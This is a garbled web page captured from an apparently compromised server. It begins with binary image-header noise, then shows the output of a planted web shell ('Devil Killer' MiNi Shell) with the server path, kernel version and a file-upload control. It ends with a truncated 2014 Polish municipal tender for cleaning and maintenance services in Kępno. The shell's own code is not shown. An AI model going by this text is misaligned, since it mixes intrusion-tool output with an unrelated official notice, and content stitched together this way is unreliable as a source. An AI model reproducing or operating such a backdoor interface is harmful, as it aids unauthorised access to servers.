JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141201/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141201/392536-N-2014.html

<p class="kh_header"><b>Kępno: UTRZYMANIE CZYSTOŚCI I PORZĄDKU NA WYBRANYCH NIERUCHOMOŚCIACH I OBIEKTACH W GMINIE KĘPNO W OKRESIE 1 STYCZNIA 2015 R. - 31 GRUDNIA 2015 R.</b><br>
<b>Numer ogłoszenia: 392536 - 2014; data zamieszczenia: 01.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kępno , ul. Ratuszowa 1, 63-600 Kępno, woj. wielkopolskie, tel. 62 78 25 800, faks 62 78 25 801.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.kepno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> UTRZYMANIE CZYSTOŚCI I PORZĄDKU NA WYBRANYCH NIERUCHOMOŚCIACH I OBIEKTACH W GMINIE KĘPNO W OKRESIE 1 STYCZNIA 2015 R. - 31 GRUDNIA 2015 R..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem przetargu jest utrzymanie czystości i porządku na wybranych nieruchomościach i obiektach położonych w Gminie Kępno (sprzątanie placów zabaw i innych nieruchomości, odśnieżanie, koszenie traw, oczyszczanie słupów ogłoszeniowych, usuwanie odpadów zgromadzonych w koszach ulicznych, prace porządkowe w miejscach pamięci narodowej, ustawianie i przechowywanie ławek ulicznych itp.) w okresie 1 stycznia 2015 r. - 31 grudnia 2015 r.
Sposób realizacji przedmiotu zamówienia określa projekt umowy, który stanowi integralną część niniejszej specyfikacji (załącznik 4).

1.	Szczegółowy zakres zamówienia obejmuje wykonanie następujących prac:
1)	utrzymanie porządku na terenach gminnych placów zabaw (w tym koszenie trawy, odchwaszczanie, wymiana piasku w piaskownicach, sprzątanie terenu wraz z opróżnianiem koszy na odpady); obowiązek określony w niniejszym punkcie realizowany będzie poprzez:
a)	sprzątanie placu zabaw w Kępnie przy ulicy Szpitalnej z następującą częstotliwością:
- 	pięć razy w tygodniu:	w okresie od 1 maja 2015r. do 31 sierpnia 2015r.;
- 	dwa razy w tygodniu: 	w okresach od 1 stycznia 2015r. do 30 kwietnia 2015r. 				oraz od 1 września 2015r. do 31 grudnia 2015r.
b)	sprzątanie placu zabaw w Kępnie przy Alejach Marcinkowskiego z następującą częstotliwością: 
- pięć razy w tygodniu:	w okresie od 1 maja 2015r. do 31 sierpnia 2015r.;
- dwa razy w tygodniu:	w okresach od 1 stycznia 2015r. do 30 kwietnia 2015r. oraz od 1 września do 31 grudnia 2015r.
c)	sprzątanie placu zabaw w Kępnie przy ulicy Nowowiejskiego (boisko TKKF Przemysław) z następującą częstotliwością:
- 	dwa razy w tygodniu: 	w okresie od 1 maja 2015r. do 31 sierpnia 2015r.;
- 	trzy razy w miesiącu: 	w okresach od 1 stycznia 2015r.do 30 kwietnia 2015r. 				oraz od 1 września 2015r. do 31 grudnia 2015r.;
d)	sprzątanie placu zabaw w Kępnie przy ul. Ruchu Oporu ( Os. Mściwoja) z następującą częstotliwością:
- 	dwa razy w tygodniu: 	w okresie od 1 maja 2015r. do 31 sierpnia 2015r.;
- 	trzy razy w miesiącu: 	w okresach od 1 stycznia 2015r.do 30 kwietnia 2015r. 				oraz od 1 września 2015r. do 31 grudnia 2015r.
e)	sprzątanie placu zabaw w Kępnie w Parku 700-lecia (w tzw. Park na Kopcu) 
z następującą częstotliwością:
- 	dwa razy w tygodniu: 	w okresie od 1 maja 2015r. do 31 sierpnia 2015r.;
- 	trzy razy w miesiącu: 	w okresach od 1 stycznia 2015r.do 30 kwietnia 2015r. 				oraz od 1 września 2015r. do 31 grudnia 2015r.;
f)	sprzątanie placów zabaw w miejscowościach: Borek Mielęcki, Domanin, Hanulin, Kliny, Mechnice, Mianowice, Osiny, Przybyszów, Rzetnia, (9 sztuk) z następującą częstotliwością:
-	raz w miesiącu:		w okresach do 1 stycznia 2015r. do 30 kwietnia 2015r. 				oraz od 1 września 2015r. do 31 grudnia 2015r.
- raz w tygodniu: 		w okresie od 1 maja 2015r. do 31 sierpnia 2015r.;
g)	sprzątanie placu zabaw w miejscowości Hanulin usytuowanym przy przedszkolu samorządowym z następującą częstotliwością:
-	raz w miesiącu:		w okresach do 1 stycznia 2015r. do 30 kwietnia 2015r. 				oraz od 1 września 2015r. do 31 grudnia 2015r.
- raz w tygodniu: 		w okresie od 1 maja 2015r. do 31 sierpnia 2015r.;
h)	sprzątanie placów zabaw w miejscowościach: Zosin, Krążkowy, Szklarka Mielęcka (3 sztuki) - planowana inwestycja postawienia placów zabaw - II kwartał 2015 roku; sprzątanie z częstotliwością :
	- raz w miesiącu:		w okresach do 1 stycznia 2015r. do 30 kwietnia 2015r. 					oraz od 1 września 2015r. do 31 grudnia 2015r.
      - raz w tygodniu: 	w okresie od 1 maja 2015r. do 31 sierpnia 2015r.;
i)	Koszenie trawy i usuwanie chwastów na placach zabaw wymienionych w ppkt 
od  a do h   nie rzadziej, niż co trzy tygodnie.
j)	Wymiana piasku w piaskownicach na gminnych placach zabaw wymienionych 
w ppkt od  a do h dokonana zostanie w okresie od 15 do 30 kwietnia 2015r.

2)	oczyszczanie słupów ogłoszeniowych na terenach wiejskich Gminy Kępno; obowiązek określony w niniejszym punkcie realizowany będzie poprzez oczyszczanie słupów ogłoszeniowych w miejscowościach:
a) 	Borek Mielęcki - 1 szt.,
b) 	Domanin - 1 szt.,
c) 	Hanulin - 1 szt.,
d) 	Kierzenko- 1 szt.,
e) 	Kierzno - 1 szt.,
f)	Kliny - 1 szt.,
g) 	Krążkowy - 1 szt.,
h) 	Mechnice - 1 szt.,
i) 	Mikorzyn - 1 szt.,
j) 	Myjomice - 1 szt.,
k) 	Olszowa - 2 szt.,
l) 	Osiny - 2 szt.,
m) 	Ostrówiec - 1 szt.,
n) 	Przybyszów - 1 szt.,
o) 	Pustkowie Kierzeńskie - 1 szt.,
p) 	Rzetnia - 1 szt.,
r) 	Szklarka Mielęcka - 1 szt.,
s) 	Świba - 2 szt.
- razem 21 słupów; słupy będą oczyszczane z częstotliwością raz na kwartał;


3)	oczyszczanie drzew, latarni, słupów energetycznych, znaków drogowych z ogłoszeń, plakatów i innych druków raz w miesiącu na następujących ulicach: Aleje Marcinkowskiego, Dąbrowskiego, Ks. P. Wawrzyniaka, Lipowa, Obr. Pokoju, Pocztowa, Poniatowskiego, Ratuszowa, Rzeźnicka, Rynek, Sienkiewicza, Staszica, Warszawska, Zamkowa,

4)	utrzymanie tzw. pogotowia śmieciowego przez zapewnienie pojazdu o pojemności skrzyni ładunkowej 1-2 m3, który w dni powszednie w godzinach 10.00-18.00 na zgłoszenie przedstawiciela UMiG Kępno lub Straży Miejskiej usuwa w czasie do 4 godzin od zgłoszenia odpady porzucone na terenach publicznych miasta Kępna,

5)	usuwanie odpadów zgromadzonych w koszach ulicznych usytuowanych na ulicach będących drogami gminnymi Gminy Kępno, niewchodzącymi w skład strefy płatnego parkowania; wykaz ulic i koszy przedstawia się następująco:
a)	Armii Krajowej - 1 szt.,
b)	Armii Poznań - 1 szt.,
c)	Berwińskiego - 1 szt.,
d)	Chopina - 1 szt.,
e)	Cichy Zaułek - 1 szt.,
f)	Estkowskiego - 2 szt.,
g)	Gimnazjalna - 2 szt.,
h)	Kilińskiego - 1 szt.,
i)	Krótka - 2 szt.,
j)	Ks. P. Wawrzyniaka (odcinek od Sikorskiego do Powstańców Wlkp.) - 5 szt.,
k)	Lenino - 1 szt.,
l)	1 Maja - 1 szt.,
m)	3 Maja - 1 szt.,
n)	Manifestu Lipcowego - 1 szt.,
o)	Mickiewicza - 1 szt.,
p)	Młyńska - 3 szt.,
q)	Moniuszki - 1 szt.,
r)	Nowowiejskiego - 1 szt.,
s)	Parkowa - 1 szt.,
t)	PKWN - 1 szt.,
u)	Pocztowa - 2 szt.,
v)	Powstańców Wlkp. - 2 szt.,
w)	Rzeźnicka - 6 szt.,
x)	Sienkiewicza (odcinek od między skrzyżowaniami z ulicami Wiosny Ludów i Wojska Polskiego) - 6 szt.,
y)	Stara - 2 szt.,
z)	Staszica - 1 szt.,
aa)	21 Stycznia - 1 szt.,
bb)	Szkolna - 1 szt.,
cc)	Szpitalna / Wawrzyniaka (parking) - 2 szt.,
dd)	Walki Młodych - 3 szt.,
ee)	Wolności - 1 szt.,
ff)	Zamkowa - 2 szt.,
gg)	tereny Polskiego Związku Wędkarskiego przy ul. Poznańskiej - 2 szt.,
- razem 60 koszy; w tym rejonie kosze uliczne będą opróżniane trzy razy w tygodniu, w tym poniedziałek i piątek oraz jeden dzień zależnie od potrzeb;


6)	usuwanie odpadów zgromadzonych w pojemnikach na psie odchody; wykaz ulic 
i pojemników przedstawia się następująco:
a)	park miejski przy ul. Dąbrowskiego - 1 szt.;
b)	ul. Rzeźnicka - 1 szt.;
c)	ul. Sienkiewicza - 1 szt.;
d)	ul. Lipowa - 1 szt.;
e)	teren zielony u zbiegu ulic: Spółdzielczej i Wiosny Ludów - 1 szt.;
f)	ul. Cicha - 1 szt.
g)	ul. Hanki Sawickiej - 1 szt.
h)	Skwer Pocztowy - 1 szt.
i)	Mianowicie - obok marketu Biedronka 1 szt.
- razem 9 pojemników; pojemniki będą opróżniane trzy razy w tygodniu, w tym poniedziałek i piątek oraz jeden dzień zależnie od potrzeb;

7)	usuwanie odpadów zgromadzonych w koszach ulicznych usytuowanych 
na terenach zieleni miejskiej w okresach 1 stycznia 2015 r. - 15 marca 2015 r. oraz 15 października 2015 r. - 31 grudnia 2015 r.: 
a)	park miejski przy ulicy Dąbrowskiego - 12 szt.,
b)	tzw. mały park przy ulicy Szpitalnej - 4 szt.,
c)	Skwer Pocztowy - 8 szt.
d)	teren zielony Park na Kopcu w Kępnie - 4 szt.
e)	teren parku położonego w Hanulinie ( dz. ewid. nr 836) - 4 szt.
f)	teren rekreacyjny położony w Hanulinie przy ul. Powstańców Śląskich ( za Przedszkolem Samorządowym w Hanulinie) - 4 szt.
g)	teren zielony położony u zbiegu ulic Spółdzielczej i Wiosny Ludów - 4 szt.
- razem 40 koszy; w tym rejonie kosze będą opróżniane trzy razy w tygodniu, w tym poniedziałek i piątek oraz jeden dzień zależnie od potrzeb;

8)	odśnieżanie ścieżek, chodników oraz wszelkich ciągów komunikacyjnych przechodzących przez teren parku miejskiego w Kępnie przy ulicy Dąbrowskiego tzw. duży park, przy ulicy Szpitalnej tzw. mały park oraz terenu zieleni miejskiej Skwer Pocztowy z częstotliwością dostosowaną do stopnia zaśnieżenia, oblodzenia i ilości zalegającego śniegu;

9)	sprzątanie i koszenie terenu byłego placu zabaw przy ulicy Ks. P. Wawrzyniaka (część działki nr 1654/3 o powierzchni ok. 280 m2) z częstotliwością raz w miesiącu; 

10)	sprzątanie i odśnieżanie nieruchomości gminnej położonej u zbiegu ulic Aleje Marcinkowskiego i Grobla (działka nr 928/2 o powierzchni 759 m2) z częstotliwością dostosowaną do stopnia zanieczyszczenia nieruchomości, ilości zalegających liści lub śniegu - nie rzadziej niż dwa razy w miesiącu,

11)	sprzątanie terenu (w tym koszenie trawy) wokół tzw. witaczy usytuowanych przy wjazdach do Kępna w Hanulinie i przy ul. Wrocławskiej z częstotliwością dostosowaną do stopnia zanieczyszczenia terenu - nie rzadziej niż dwa razy w miesiącu;

12)	sprzątanie terenu kępińskiego Rynku ( lub terenu KOSiR) po festynie organizowanym z okazji Święta Narodowego 3 Maja (1-3 maja - sprzątanie w ciągu 3 dni), zależnie od lokalizacji imprezy,

13)	sprzątanie kępińskiego Rynku (lub terenu KOSiR) po imprezach organizowanych z okazji Dni Kępna (19-21 czerwca 2015r. - sprzątanie w ciągu 3 dni), zależnie od lokalizacji imprezy,

14)	sprzątanie kępińskiego Rynku (lub terenu KOSiR) po imprezach organizowanych z okazji Dnia Dziecka ( 31 maja 2015r. lub 1 czerwca 2015r. - sprzątanie w ciągu 1 dnia), zależnie od lokalizacji i terminu imprezy,


15)	porządkowanie kępińskiego Rynku po nocy sylwestrowej w dniu 31 grudnia 2015r. i  1 stycznia 2016r. ( sprzątanie w ciągu 2 dni ),

16)	sprzątanie terenów zielonych na kępińskim Rynku w okresach 1 stycznia 2015 r. - 15 marca 2015 r. oraz 15 października 2015 r. - 31 grudnia 2015 r.:
a)	klomby na południowej pierzei o powierzchni 240 m2,
b)	klomb na północnej pierzei o powierzchni 150 m2,
c)	klomb wokół pomnika o powierzchni 80 m2,
d)	klomb wokół komory klimatyzacyjnej przy ratuszu o powierzchni 75 m2,
e)	tereny pod drzewami (ograniczone obrzeżami, o powierzchni jednostkowej 0,4 m2) - wokół 53 drzew; 
- sprzątanie trzy razy w tygodniu;

17)	sprzątanie klombów na ul. Rzeźnickiej i Polnej (o łącznej powierzchni ok. 250 m2) w okresach 1 stycznia 2015r. - 31 marca 2015r. oraz 15 października 2015r. - 31 grudnia 2015 r. - z częstotliwością  trzy razy w tygodniu;

18)	prace porządkowe w następujących miejscach pamięci narodowej:
a)	Kępno, cmentarz katolicki przy ulicy Sienkiewicza; pomnik Poległym i zmarłym za wolność Ojczyzny z 1930 r.,
b)	Kępno, cmentarz katolicki przy ulicy Sienkiewicza; pomnik Chwała bezimiennym bohaterom z 1981 r.,
c)	Kępno, cmentarz katolicki przy ulicy Sienkiewicza; groby żołnierzy i funkcjonariuszy poległych w latach w latach 1945-46 (11 grobów),
d)	Kępno, ulica Księdza Mariana Magnuszewskiego - miejsce pamięci osób pomordowanych przez Powiatowy Urząd Bezpieczeństwa Publicznego w Kępnie w latach 1945-1956,
e)	miejscowość Przybyszów - Korzeń; pomnik ku pamięci Powstańców Wielkopolskich.
Obowiązek ten realizowany będzie poprzez sprzątanie, usuwanie chwastów, przycinanie trawy i zamiatanie wymienionych miejsc raz w miesiącu. Umowa nie obejmuje napraw konstrukcji budowli, malowania, kosztów okolicznościowych zniczy i kwiatów.

19)	przechowywanie ławek ulicznych (ok. 15 szt.) w okresie zimowym ( od 1 stycznia 2015r. do 30 kwietnia 2015r.) i jesiennym ( od 15 października 2015r. do 31 grudnia 2015r.) oraz ustawianie ich na terenie Kępna na okres letni w miejscach wskazanych przez Zleceniodawcę,

3.	Przedmiot zamówienia zostanie wykonany w całości przy wykorzystaniu materiałów Wykonawcy oraz z zastosowaniem jego narzędzi pracy, maszyn, urządzeń i środków transportu.
4. Zamawiający zastrzega obowiązek osobistego wykonania przez wykonawcę całości zamówienia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 3.000,00 zł. ( słownie: trzy tysiące zlotych)
Wadium może być wniesione w następujących formach:
1) pieniądzu,
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3) gwarancjach bankowych,
4) gwarancjach ubezpieczeniowych,
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy
z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U.
z 2007 r., Nr 42, poz. 275).
Wadium w pieniądzu powinno być wpłacone przelewem na konto Zamawiającego w Banku
Zachodnim WBK S.A.. Oddział w Kępnie nr rachunku 65 1090 1144 0000 0000 1400 3711.
Wadium w innej formie niż w pieniądzu należy złożyć w kasie Urzędu Miasta i Gminy w Kępnie ul. Ratuszowa 1, 63-600 Kępno, dołączając do oferty potwierdzenie złożenia wadium.
Wadium wnosi się przed terminem składania ofert.
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na
wezwanie, o którym mowa w art. 26 ust. 3 Pzp, nie złożył dokumentów lub oświadczeń,
o których mowa w art. 25 ust. 1 Pzp lub pełnomocnictw, chyba że udowodni, że wynika to
z przyczyn nieleżących po jego stronie.
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została
wybrana:
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach
określonych w ofercie;
2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn
leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek udziału w postępowaniu, jeżeli przedłoży zezwolenie na prowadzenie działalności w zakresie zbierania odpadów, o którym mowa w art. 27 ust. 2 ustawy z dnia 14 grudnia 2012 r. o odpadach (tekst jednolity: Dz. U. z 2013 r. poz. 21, z późn. zm.).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek udziału w postępowaniu, jeżeli wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie, co najmniej przez 3 miesiące świadczył usługi polegające na utrzymaniu czystości i porządku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
